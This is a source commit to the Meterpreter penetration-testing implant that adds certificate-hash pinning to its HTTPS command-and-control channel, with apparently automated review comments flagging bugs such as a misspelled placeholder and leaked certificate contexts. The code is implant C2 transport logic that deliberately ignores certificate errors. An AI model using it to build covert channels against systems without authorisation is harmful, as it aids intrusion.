Add support for SSL cert validation
Tweak the SSL implementation so that for https meterpreters the SSL certificate is validated against a hash that is specified in the payload. If the hash isn't specified, then certificate validation isn't attempted.
This commit is contained in:
parent
f44b44f2ce
commit
0739cbc0f3
@ -5,8 +5,8 @@
|
||||
#ifndef _METERPRETER_SOURCE_COMMON_COMMON_H
|
||||
#define _METERPRETER_SOURCE_COMMON_COMMON_H
|
||||
|
||||
/*! @brief When defined, debug output is enabled on Windows builds. */
|
||||
#define DEBUGTRACE 1
|
||||
/*! @brief Set to 0 for "normal", and 1 to "verbose", comment out to disable completely. */
|
||||
//#define DEBUGTRACE 0
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
@ -140,6 +140,7 @@ int netlink_get_interfaces(struct ifaces_list **iface_list);
|
||||
extern int debugging_enabled;
|
||||
|
||||
#define dprintf(...) if(debugging_enabled) { real_dprintf(__FILE__, __LINE__, __FUNCTION__, __VA_ARGS__); }
|
||||
#define vdprintf(...) do{}while(0);
|
||||
|
||||
void real_dprintf(char *filename, int line, const char *function, char *format, ...);
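Review bot: `#define vdprintf(...) do{}while(0);` carries its own trailing semicolon, so a call site written `vdprintf(...);` expands to an empty statement after the loop and `if (x) vdprintf(...); else …` stops compiling because the `else` no longer attaches to the `if`. Drop the semicolon from the macro body, `#define vdprintf(...) do{}while(0)`, and let the call site supply it; the same form is used for the `dprintf`/`vdprintf` fallbacks in the `#ifdef DEBUGTRACE` hunk that follows. The adjacent `dprintf` definition is an unbraced `if` with the usual dangling-else hazard, but that line is untouched by this commit.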
|
||||
|
||||
@ -172,8 +173,14 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
|
||||
|
||||
#ifdef DEBUGTRACE
|
||||
#define dprintf(...) real_dprintf(__VA_ARGS__)
|
||||
#if DEBUGTRACE == 1
|
||||
#define vdprintf dprintf
|
||||
#else
|
||||
#define vdprintf(...) do{}while(0);
|
||||
#endif
|
||||
#else
|
||||
#define dprintf(...) do{}while(0);
|
||||
#define vdprintf(...) do{}while(0);
|
||||
#endif
|
||||
|
||||
/*! @brief Sets `dwResult` to the return value of `GetLastError()`, prints debug output, then does `break;` */
|
||||
|
@ -1351,7 +1351,7 @@ DWORD packet_transmit_via_http_winhttp(Remote *remote, Packet *packet, PacketReq
|
||||
|
||||
hRes = WinHttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader), packet->payloadLength + sizeof(TlvHeader), 0);
|
||||
|
||||
if (! hRes)
|
||||
if (!hRes)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
@ -1376,7 +1376,7 @@ DWORD packet_transmit_via_http_winhttp(Remote *remote, Packet *packet, PacketReq
|
||||
* @return An indication of the result of processing the transmission request.
|
||||
* @remark This function is not available on POSIX.
|
||||
*/
|
||||
DWORD packet_transmit_via_http_wininet( Remote *remote, Packet *packet, PacketRequestCompletion *completion )
|
||||
DWORD packet_transmit_via_http_wininet(Remote *remote, Packet *packet, PacketRequestCompletion *completion)
|
||||
{
|
||||
DWORD res = 0;
|
||||
HINTERNET hReq;
|
||||
@ -1388,8 +1388,9 @@ DWORD packet_transmit_via_http_wininet( Remote *remote, Packet *packet, PacketRe
|
||||
|
||||
flen = sizeof(flags);
|
||||
|
||||
buffer = malloc( packet->payloadLength + sizeof(TlvHeader) );
|
||||
if (! buffer) {
|
||||
buffer = malloc(packet->payloadLength + sizeof(TlvHeader));
|
||||
if (!buffer)
|
||||
{
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
return 0;
|
||||
}
|
||||
@ -1397,35 +1398,39 @@ DWORD packet_transmit_via_http_wininet( Remote *remote, Packet *packet, PacketRe
|
||||
memcpy(buffer, &packet->header, sizeof(TlvHeader));
|
||||
memcpy(buffer + sizeof(TlvHeader), packet->payload, packet->payloadLength);
|
||||
|
||||
do {
|
||||
do
|
||||
{
|
||||
|
||||
flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
|
||||
flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
|
||||
flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
|
||||
}
|
||||
|
||||
hReq = HttpOpenRequest(remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0);
|
||||
hReq = HttpOpenRequestW(remote->hConnection, L"POST", remote->uri, NULL, NULL, NULL, flags, 0);
|
||||
|
||||
if (hReq == NULL) {
|
||||
if (hReq == NULL)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
|
||||
InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS)
|
||||
{
|
||||
InternetQueryOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
|
||||
flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
|
||||
InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
|
||||
}
|
||||
|
||||
hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader) );
|
||||
hRes = HttpSendRequest(hReq, NULL, 0, buffer, packet->payloadLength + sizeof(TlvHeader));
|
||||
|
||||
if (! hRes) {
|
||||
if (!hRes)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE] Failed HttpSendRequest: %d", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
} while(0);
|
||||
} while (0);
|
||||
|
||||
memset(buffer, 0, packet->payloadLength + sizeof(TlvHeader));
|
||||
InternetCloseHandle(hReq);
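Review bot: The HTTPS branch of this hunk still ORs `SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID` into the request and never looks at `remote->pCertHash`, so on the WinINet build the packet body reaches `HttpSendRequest` whatever certificate the server presents; the only pin check visible in this commit is in the WinHTTP receive path. `SECURITY_FLAG_IGNORE_UNKNOWN_CA` is listed twice in that expression, which looks like a copy-paste slip where `SECURITY_FLAG_IGNORE_CERT_DATE_INVALID` (already ignored via the `INTERNET_FLAG_*` line above) was intended. The same flag expression and missing check recur in the two WinINet receive hunks near `packet_receive_http_via_wininet`, and this hunk's `InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, …)` keeps the suffix-less name while the receive hunk switches to `InternetSetOptionW`. Until the WinINet path can compare the server certificate, mark the gap at the top of the branch: `// TODO: remote->pCertHash is not checked on the WinINet transport; only the WinHTTP receive path pins the certificate`. packet_transmit_via_http_wininet continues past the end of the hunk.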
|
||||
@ -1443,7 +1448,7 @@ DWORD packet_transmit_via_http_wininet( Remote *remote, Packet *packet, PacketRe
|
||||
* @param completion Pointer to the completion routines to process.
|
||||
* @return An indication of the result of processing the transmission request.
|
||||
*/
|
||||
DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCompletion *completion )
|
||||
DWORD packet_transmit_via_http(Remote *remote, Packet *packet, PacketRequestCompletion *completion)
|
||||
{
|
||||
CryptoContext *crypto;
|
||||
Tlv requestId;
|
||||
@ -1453,7 +1458,7 @@ DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCom
|
||||
#endif
|
||||
|
||||
|
||||
lock_acquire( remote->lock );
|
||||
lock_acquire(remote->lock);
|
||||
|
||||
// If the packet does not already have a request identifier, create one for it
|
||||
if (packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID, &requestId) != ERROR_SUCCESS)
|
||||
@ -1476,24 +1481,24 @@ DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCom
|
||||
// If a completion routine was supplied and the packet has a request
|
||||
// identifier, insert the completion routine into the list
|
||||
if ((completion) &&
|
||||
(packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID,
|
||||
&requestId) == ERROR_SUCCESS))
|
||||
(packet_get_tlv_string(packet, TLV_TYPE_REQUEST_ID,
|
||||
&requestId) == ERROR_SUCCESS))
|
||||
packet_add_completion_handler((LPCSTR)requestId.buffer, completion);
|
||||
|
||||
// If the endpoint has a cipher established and this is not a plaintext
|
||||
// packet, we encrypt
|
||||
if ((crypto = remote_get_cipher(remote)) &&
|
||||
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_REQUEST) &&
|
||||
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_RESPONSE))
|
||||
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_REQUEST) &&
|
||||
(packet_get_type(packet) != PACKET_TLV_TYPE_PLAIN_RESPONSE))
|
||||
{
|
||||
ULONG origPayloadLength = packet->payloadLength;
|
||||
PUCHAR origPayload = packet->payload;
|
||||
|
||||
// Encrypt
|
||||
if ((res = crypto->handlers.encrypt(crypto, packet->payload,
|
||||
packet->payloadLength, &packet->payload,
|
||||
&packet->payloadLength)) !=
|
||||
ERROR_SUCCESS)
|
||||
packet->payloadLength, &packet->payload,
|
||||
&packet->payloadLength)) !=
|
||||
ERROR_SUCCESS)
|
||||
{
|
||||
SetLastError(res);
|
||||
break;
|
||||
@ -1513,7 +1518,8 @@ DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCom
|
||||
// XXX: Implement non-windows HTTP delivery
|
||||
#endif
|
||||
|
||||
if(res < 0) {
|
||||
if (res < 0)
|
||||
{
|
||||
dprintf("[PACKET] transmit failed with return %d\n", res);
|
||||
break;
|
||||
}
|
||||
@ -1526,7 +1532,7 @@ DWORD packet_transmit_via_http( Remote *remote, Packet *packet, PacketRequestCom
|
||||
// Destroy the packet
|
||||
packet_destroy(packet);
|
||||
|
||||
lock_release( remote->lock );
|
||||
lock_release(remote->lock);
|
||||
|
||||
return res;
|
||||
}
|
||||
@ -1779,10 +1785,10 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS)
|
||||
{
|
||||
flags |= WINHTTP_FLAG_SECURE;
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Setting secure flag..");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Setting secure flag..");
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] opening request on connection %x to %S", remote->hConnection, remote->uri);
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] opening request on connection %x to %S", remote->hConnection, remote->uri);
|
||||
hReq = WinHttpOpenRequest(remote->hConnection, L"POST", remote->uri, NULL, NULL, NULL, flags);
|
||||
|
||||
if (hReq == NULL)
|
||||
@ -1794,7 +1800,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] transport is SSL, setting up...");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] transport is SSL, setting up...");
|
||||
flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA
|
||||
| SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
|
||||
| SECURITY_FLAG_IGNORE_CERT_CN_INVALID
|
||||
@ -1805,7 +1811,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
}
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] sending the 'RECV' command...");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] sending the 'RECV' command...");
|
||||
// TODO: when the MSF side supports it, update this so that it's UTF8
|
||||
char pRecv[] = "RECV";
|
||||
hRes = WinHttpSendRequest(hReq, WINHTTP_NO_ADDITIONAL_HEADERS, 0, pRecv, sizeof(pRecv), sizeof(pRecv), 0);
|
||||
@ -1819,27 +1825,63 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
|
||||
// TODO: validate the server certificate
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Waiting to see the response ...");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Waiting to see the response ...");
|
||||
if (!WinHttpReceiveResponse(hReq, NULL))
|
||||
{
|
||||
dprintf("[PACKET RECEIVE] Failed WinHttpReceiveResponse: %d", GetLastError());
|
||||
vdprintf("[PACKET RECEIVE] Failed WinHttpReceiveResponse: %d", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
if (remote->pCertHash != NULL)
|
||||
{
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] validating certificate hash");
|
||||
PCERT_CONTEXT pCertContext = NULL;
|
||||
DWORD dwCertContextSize = sizeof(pCertContext);
|
||||
|
||||
if (!WinHttpQueryOption(hReq, WINHTTP_OPTION_SERVER_CERT_CONTEXT, &pCertContext, &dwCertContextSize))
|
||||
{
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Failed to get the certificate context: %u", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
DWORD dwHashSize = 20;
|
||||
BYTE hash[20];
|
||||
if (!CertGetCertificateContextProperty(pCertContext, CERT_SHA1_HASH_PROP_ID, hash, &dwHashSize))
|
||||
{
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Failed to get the certificate hash: %u", GetLastError());
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
vdprintf("[SERVER] Server hash set to: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
|
||||
hash[0], hash[1], hash[2], hash[3], hash[4], hash[5], hash[6], hash[7], hash[8], hash[9], hash[10],
|
||||
hash[11], hash[12], hash[13], hash[14], hash[15], hash[16], hash[17], hash[18], hash[19]);
|
||||
|
||||
if (memcmp(hash, remote->pCertHash, 20) != 0)
|
||||
{
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Certificate hash doesn't match, bailing out");
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
#ifdef DEBUGTRACE
|
||||
DWORD dwSize = 0;
|
||||
if (!WinHttpQueryDataAvailable(hReq, &dwSize))
|
||||
{
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] WinHttpQueryDataAvailable failed: %x", GetLastError());
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] WinHttpQueryDataAvailable failed: %x", GetLastError());
|
||||
}
|
||||
else
|
||||
{
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Available data: %u bytes", dwSize);
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Available data: %u bytes", dwSize);
|
||||
}
|
||||
#endif
|
||||
|
||||
// Read the packet length
|
||||
retries = 3;
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Start looping through the receive calls");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Start looping through the receive calls");
|
||||
while (inHeader && retries > 0)
|
||||
{
|
||||
retries--;
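Review bot: The `PCERT_CONTEXT` returned by `WinHttpQueryOption(hReq, WINHTTP_OPTION_SERVER_CERT_CONTEXT, …)` is owned by the caller and has to be released with `CertFreeCertificateContext`, but nothing in the hunk frees it on the success path or on the two `break` paths that follow, so every HTTPS receive leaks a certificate context. Release it as soon as the SHA-1 property has been copied out, saving `GetLastError()` first because the free may overwrite it. The comparison also runs only after `WinHttpReceiveResponse`, i.e. after the `RECV` body has already gone out; that is tolerable here because the body is a constant, but it means the transmit function needs its own check, and none is visible in the `packet_transmit_via_http_winhttp` hunks of this commit. The three literal `20`s (`dwHashSize`, `hash[20]`, `memcmp`) would read better as one named constant shared with the `pCertHash` declaration in remote.h. packet_receive_http_via_winhttp starts and ends outside this hunk.
```c
			PCERT_CONTEXT pCertContext = NULL;
			DWORD dwCertContextSize = sizeof(pCertContext);
			// … unchanged: WinHttpQueryOption(WINHTTP_OPTION_SERVER_CERT_CONTEXT) and its failure path …

			BYTE hash[20];
			DWORD dwHashSize = sizeof(hash);
			BOOL bGotHash = CertGetCertificateContextProperty(pCertContext, CERT_SHA1_HASH_PROP_ID, hash, &dwHashSize);
			DWORD dwHashError = GetLastError();

			// The context handed back by WINHTTP_OPTION_SERVER_CERT_CONTEXT is ours to release.
			CertFreeCertificateContext(pCertContext);
			pCertContext = NULL;

			if (!bGotHash)
			{
				vdprintf("[PACKET RECEIVE WINHTTPS] Failed to get the certificate hash: %u", dwHashError);
				SetLastError(ERROR_NOT_FOUND);
				break;
			}
			// … unchanged: hash debug print and memcmp against remote->pCertHash …
```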
|
||||
@ -1850,7 +1892,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
break;
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] Data received: %u bytes", bytesRead);
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] Data received: %u bytes", bytesRead);
|
||||
|
||||
// If the response contains no data, this is fine, it just means the
|
||||
// remote side had nothing to tell us. Indicate this through a
|
||||
@ -1884,7 +1926,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
}
|
||||
|
||||
// Initialize the header
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] initialising header");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] initialising header");
|
||||
header.length = header.length;
|
||||
header.type = header.type;
|
||||
payloadLength = ntohl(header.length) - sizeof(TlvHeader);
|
||||
@ -1901,7 +1943,7 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
retries = payloadBytesLeft;
|
||||
while (payloadBytesLeft > 0 && retries > 0)
|
||||
{
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] reading more data from the body...");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] reading more data from the body...");
|
||||
retries--;
|
||||
if (!WinHttpReadData(hReq, payload + payloadLength - payloadBytesLeft, payloadBytesLeft, &bytesRead))
|
||||
{
|
||||
@ -1912,14 +1954,12 @@ DWORD packet_receive_http_via_winhttp(Remote *remote, Packet **packet)
|
||||
|
||||
if (!bytesRead)
|
||||
{
|
||||
dprintf("PAYLOAD: %s", payload);
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] no bytes read, bailing out");
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] no bytes read, bailing out");
|
||||
SetLastError(ERROR_NOT_FOUND);
|
||||
break;
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE WINHTTPS] bytes read: %u", bytesRead);
|
||||
vdprintf("[PACKET RECEIVE WINHTTPS] bytes read: %u", bytesRead);
|
||||
payloadBytesLeft -= bytesRead;
|
||||
}
|
||||
|
||||
@ -2023,14 +2063,16 @@ DWORD packet_receive_http_via_wininet( Remote *remote, Packet **packet )
|
||||
|
||||
lock_acquire( remote->lock );
|
||||
|
||||
do {
|
||||
do
|
||||
{
|
||||
|
||||
flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI;
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
|
||||
flags |= INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID;
|
||||
}
|
||||
|
||||
dprintf("[PACKET RECEIVE] HttpOpenRequest");
|
||||
hReq = HttpOpenRequest( remote->hConnection, "POST", remote->uri, NULL, NULL, NULL, flags, 0 );
|
||||
hReq = HttpOpenRequestW(remote->hConnection, L"POST", remote->uri, NULL, NULL, NULL, flags, 0 );
|
||||
|
||||
if (hReq == NULL) {
|
||||
dprintf("[PACKET RECEIVE] Failed HttpOpenRequest: %d", GetLastError());
|
||||
@ -2041,7 +2083,7 @@ DWORD packet_receive_http_via_wininet( Remote *remote, Packet **packet )
|
||||
if (remote->transport == METERPRETER_TRANSPORT_HTTPS) {
|
||||
InternetQueryOption( hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, &flen);
|
||||
flags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
|
||||
InternetSetOption(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
|
||||
InternetSetOptionW(hReq, INTERNET_OPTION_SECURITY_FLAGS, &flags, flen);
|
||||
}
|
||||
|
||||
hRes = HttpSendRequest(hReq, NULL, 0, "RECV", 4 );
|
||||
|
@ -43,6 +43,7 @@ typedef struct _Remote
|
||||
wchar_t* uri; ///< URI endpoint in use during HTTP or HTTPS transport use.
|
||||
HANDLE hInternet; ///< Handle to the internet module for use with HTTP and HTTPS.
|
||||
HANDLE hConnection; ///< Handle to the HTTP or HTTPS connection.
|
||||
PBYTE pCertHash; ///< Pointer to the 20-byte certificate hash to validate
|
||||
|
||||
int expiration_time; ///< Unix timestamp for when the server should shut down.
|
||||
int start_time; ///< Unix timestamp representing the session startup time.
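Review bot: The new `pCertHash` comment records the size but not the ownership or the disable convention, both of which the other hunks rely on: `server_setup` points it at the `global_meterpreter_ssl_cert_hash` placeholder rather than at an allocation, and the WinHTTP receive path treats `NULL` as "do not validate". Suggest `PBYTE pCertHash; ///< 20-byte SHA-1 of the expected server certificate; NULL disables validation. Points into the payload's configuration, not owned by this struct.`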
|
||||
|
@ -21,6 +21,7 @@ wchar_t * global_meterpreter_ua = L"METERPRETER_UA\x00\x00\x00\x00\x00\x00\x00\x
|
||||
wchar_t * global_meterpreter_proxy = L"METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
||||
wchar_t * global_meterpreter_proxy_username = L"METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
||||
wchar_t * global_meterpreter_proxy_password = L"METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
|
||||
PBYTE global_meterpreter_ssl_cert_hash = "METERPRETER_SSL_CERT_HASH\x00";
|
||||
int global_expiration_timeout = 0xb64be661;
|
||||
int global_comm_timeout = 0xaf79257f;
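Review bot: `PBYTE global_meterpreter_ssl_cert_hash = "METERPRETER_SSL_CERT_HASH\x00";` assigns a `char` string literal to an unsigned byte pointer and leaves the patching contract implicit: the literal is 27 bytes including terminators, the receive path reads 20 of them, and the unmodified text is the "not set" sentinel that `server_setup` compares against. A cast and a comment make that explicit, e.g. `// 20-byte SHA-1 is patched over the start of this placeholder; unpatched text means "no validation".` followed by `PBYTE global_meterpreter_ssl_cert_hash = (PBYTE)"METERPRETER_SSL_CERT_HASH\x00";`. The neighbouring globals reserve their space with explicit `\x00` padding, so the same treatment here would keep the block consistent.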
|
||||
|
||||
@ -737,8 +738,17 @@ DWORD server_setup(SOCKET fd)
|
||||
}
|
||||
else if (wcscmp(global_meterpreter_transport + 12, L"TRANSPORT_HTTPS") == 0)
|
||||
{
|
||||
PBYTE hash = global_meterpreter_ssl_cert_hash;
|
||||
pRemote->transport = METERPRETER_TRANSPORT_HTTPS;
|
||||
dprintf("[SERVER] Using HTTPS transport...");
|
||||
dprintf("[SERVER] Using HTTPS transport: Hash set to: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x",
|
||||
hash[0], hash[1], hash[2], hash[3], hash[4], hash[5], hash[6], hash[7], hash[8], hash[9], hash[10],
|
||||
hash[11], hash[12], hash[13], hash[14], hash[15], hash[16], hash[17], hash[18], hash[19]);
|
||||
|
||||
if (strcmp(hash, "METERPETER_SSL_CERT_HASH") != 0)
|
||||
{
|
||||
pRemote->pCertHash = hash;
|
||||
dprintf("[SERVER] is validating hashes %p", pRemote->pCertHash);
|
||||
}
|
||||
}
|
||||
else if (wcscmp(global_meterpreter_transport + 12, L"TRANSPORT_HTTP") == 0)
|
||||
{
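Review bot: The placeholder comparison `strcmp(hash, "METERPETER_SSL_CERT_HASH")` is missing the `R` in METERPRETER, so it can never match the unpatched value `"METERPRETER_SSL_CERT_HASH"` declared in the globals hunk above; `pRemote->pCertHash` is therefore set even when no hash was supplied, and as far as these hunks show the WinHTTP receive path would then compare the server's SHA-1 against the placeholder bytes and reject every HTTPS session, contrary to the commit message. Change it to `if (strcmp((char *)hash, "METERPRETER_SSL_CERT_HASH") != 0)`, or better compare both sites through one shared literal so they cannot drift again. The `hash[0..19]` debug print runs before this check, so it dumps placeholder text when nothing was patched; harmless, but misleading. server_setup continues outside this hunk on both sides.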
|
||||
|
@ -9,6 +9,9 @@
|
||||
|
||||
#ifdef USE_WINHTTP
|
||||
|
||||
#define HOSTNAME_LEN 512
|
||||
#define URLPATH_LEN 1024
|
||||
|
||||
DWORD server_dispatch_http_winhttp(Remote* remote, THREAD* serverThread, int iExpirationTimeout, int iCommTimeout,
|
||||
wchar_t* pMetUA, wchar_t* pMetProxy, wchar_t* pMetProxyUser, wchar_t* pMetProxyPass)
|
||||
{
|
||||
@ -71,10 +74,10 @@ DWORD server_dispatch_http_winhttp(Remote* remote, THREAD* serverThread, int iEx
|
||||
ZeroMemory(&bits, sizeof(bits));
|
||||
bits.dwStructSize = sizeof(bits);
|
||||
|
||||
bits.dwHostNameLength = sizeof(tmpHostName)-1;
|
||||
bits.dwHostNameLength = HOSTNAME_LEN - 1;
|
||||
bits.lpszHostName = tmpHostName;
|
||||
|
||||
bits.dwUrlPathLength = sizeof(tmpUrlPath)-1;
|
||||
bits.dwUrlPathLength = URLPATH_LEN - 1;
|
||||
bits.lpszUrlPath = tmpUrlPath;
|
||||
|
||||
WinHttpCrackUrl(remote->url, 0, 0, &bits);
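Review bot: `bits.dwHostNameLength = HOSTNAME_LEN - 1;` and `bits.dwUrlPathLength = URLPATH_LEN - 1;` describe `tmpHostName`/`tmpUrlPath` to `WinHttpCrackUrl` through constants declared separately from the arrays, so the two can drift if either is edited; `sizeof(tmpHostName) / sizeof(tmpHostName[0]) - 1` keeps the character count tied to the buffer (the old `sizeof(tmpHostName)-1` was a byte count, which over-reports for a `wchar_t` array). The array declarations are outside this hunk, so their current type is inferred from the parallel WinINet change. The WinINet dispatch hunk below makes the same substitution.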
|
||||
|
@ -3,6 +3,9 @@
|
||||
|
||||
#ifndef USE_WINHTTP
|
||||
|
||||
#define HOSTNAME_LEN 512
|
||||
#define URLPATH_LEN 1024
|
||||
|
||||
DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iExpirationTimeout, int iCommTimeout,
|
||||
wchar_t* pMetUA, wchar_t* pMetProxy, wchar_t* pMetProxyUser, wchar_t* pMetProxyPass)
|
||||
{
|
||||
@ -13,8 +16,8 @@ DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iE
|
||||
URL_COMPONENTS bits;
|
||||
DWORD ecount = 0;
|
||||
DWORD delay = 0;
|
||||
char tmpHostName[512];
|
||||
char tmpUrlPath[1024];
|
||||
wchar_t tmpHostName[HOSTNAME_LEN];
|
||||
wchar_t tmpUrlPath[URLPATH_LEN];
|
||||
|
||||
remote->expiration_time = 0;
|
||||
if (iExpirationTimeout > 0)
|
||||
@ -27,7 +30,7 @@ DWORD server_dispatch_http_wininet(Remote * remote, THREAD* serverThread, int iE
|
||||
remote->comm_last_packet = current_unix_timestamp();
|
||||
|
||||
// Allocate the top-level handle
|
||||
if (!strcmp(pMetProxy, "METERPRETER_PROXY"))
|
||||
if (!wcscmp(pMetProxy, L"METERPRETER_PROXY"))
|
||||
{
|
||||
